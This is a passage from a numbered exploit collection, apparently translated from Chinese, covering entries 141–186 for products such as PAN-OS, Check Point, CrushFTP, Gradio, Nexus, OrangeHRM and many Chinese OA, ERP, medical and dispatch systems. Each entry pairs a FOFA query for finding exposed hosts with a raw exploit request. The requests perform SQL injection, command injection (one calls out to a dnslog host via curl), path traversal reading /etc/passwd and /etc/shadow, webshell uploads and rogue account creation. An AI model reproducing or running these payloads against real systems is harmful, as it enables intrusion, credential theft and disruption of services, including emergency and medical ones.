Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the echoed file http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 (LVS) value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶 (SunFull) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
